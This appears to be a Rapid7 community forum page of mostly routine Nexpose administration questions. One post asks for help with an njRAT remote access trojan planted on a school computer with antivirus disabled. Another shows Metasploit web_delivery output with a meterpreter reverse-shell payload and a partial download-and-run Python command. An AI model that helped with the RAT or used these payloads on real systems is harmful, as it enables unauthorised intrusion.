com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 2018-03-01T02:15:50 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 2018-03-01T02:15:51 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities. 2018-03-01T02:16:23 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities.
Posted by Sherman about a year ago
It is not explicitly stated on the following page whether installing the application on Windows Server 2016 is supported. We are looking to do a rebuild of our console by doing a clean install of the application on a new server and importing the database from the current installation. https://www.rapid7.com/products/nexpose/system-requirements/ Is the webpage out of date? The OS has been out for over a year.
Posted by Alan Rivaldo about a year ago
Currently I am collecting all assets that have not been scanned in 60+ days and based on that attribute, those assets are automatically added to a 'legacy asset site'. Every 60 days, I simply export those collected assets manually into a .CSV so I have a record/back up of them, then I manually delete the assets within the site, and repeat in 60 days. While this works, it can be admin heavey. I'm wondering if there is a better way to retrieve the same data via an automated SQL query or other report? Maybe there is a better process someone is using to get the same results? The intent here is to get a good handle of assets being removed from our environment. Thanks for any guidance you can provide.
Posted by Martin Wensley about a year ago
ok so i made a RAT using njrat and i opened it on my school, port forwarding is enabled and i even tried it on my friend and it worked. when i opened the rat in school (after closing the anti-virus for ever) i looked at netstat to check if it worked (because i couldnt check right away) and the results of the netstat was: my public ip: x.x.x.x:5552 and i opened port 5552. so that HAS to be my rat. but when i came home i couldnt access the computer and in the logs no computer were hacked. what is the reason for that and how can i make my RAT work? (i can portforward and i did portforward)
Posted by ori shamir about a year ago
[Originally posted by **Narendra Jayram**] I came up with three approaches. But, stuck :( First Approach: Hitting the link Problem: I am not seeing the complete software details. It seems to be not accurate as I am not seeing any web apps and other native apps . Second approach: Pulling all the asset details; then get the software details Problem: I am finding it bit challenging to hunt for software this way Third approach: Through SQL query ``` SELECT da.ip_address as IP_Address, da.host_name as Hostname, ds.name as Software, ds.version as Version FROM fact_asset_scan_software JOIN dim_asset da USING (asset_id) JOIN dim_software ds USING (software_id) ``` Problem: Vulnerability filters are being applied by default. In simple words, I am trying to find all the software details classified based on the host/ IP. PS: I am not looking for vulnerability report. I am using nexpose like an asset inventory
Posted by Edward Sheehy about a year ago
In setting our scheduled scans, I'm having some frustrations with the limitations of the schedule. What I would like is the option to be able to specify what week AND day scans run. For example, we have our scans run during the first full week of every month, with a different site scanning every day of that week. So for site A, I set the schedule to be the first Monday of the month. For site B, it would be the first Tuesday of the month. The issue is that if the first Tuesday is the 1st of the month, and the first Monday scan will take place the following week. Is this the best forum for a feature request like this?
Posted by Zach Garrow about a year ago
I am trying to find out how Metasploit RPC work by connecting the Metasplout RPC server from a Kali client VM and run some RPC api. The connection to the Metasploit RPC service from the Kali client VM is ok. Then I try to run the following RPC api: >>> opts = {"LHOST" => "10.101.23.27", "TARGETT" => "0", "PAYLOAD" => "python/meterpreter_reverse_tcp" } >>> rpc.call("module.execute", "exploit", "multi/script/web_delivery", opts) The returned info is: {"job_id"=>0, "uuid"=>"2bfysfuy"} Where could I find the payload information returned from the module execution api above ? The particular info I am looking for is "Python python -c ..." as below. I ran same scenario using msfconsole and got the output below after running the exploit : ...... msf exploit(web_delivery) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.101.23.27:4444 msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/WYoPUj2vE2H [*] Local IP: http://10.101.23.27:8080/WYoPUj2vE2H [*] Server started. [*] Run the following command on the target machine: Python: python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http I am new to Metasploit and Ruby, appreciate any help to the issue ? Alex.
Posted by Alex Lui about a year ago
Hell all, I'm attempting to resolve a few vulnerabilities that Nexpose is reporting. After a scan I'm being told that there are few ciphers that are insecure. I am able to block these ciphers on port 5989 without any issues/impact to the environment. However, when I block these ciphers on port 443 I am unable to access the host gui via HTTPS and the host will lose connectivity within vSphere. Here is my question, has anyone else ran into this issue while trying to become PCI compliant within a 6.5 vmware environment and if so, what ciphers did you block, if any? Thanks. P.S. Here is a list of the ciphers that Nexpose is reporting as weak. TLS_RSA_WITH_AES_128_CBC_SHA TLS_RSA_WITH_AES_128_CBC_SHA256 TLS_RSA_WITH_AES_128_GCM_SHA256 TLS_RSA_WITH_AES_256_CBC_SHA TLS_RSA_WITH_AES_256_CBC_SHA256 TLS_RSA_WITH_AES_256_GCM_SHA384
Posted by Charles about a year ago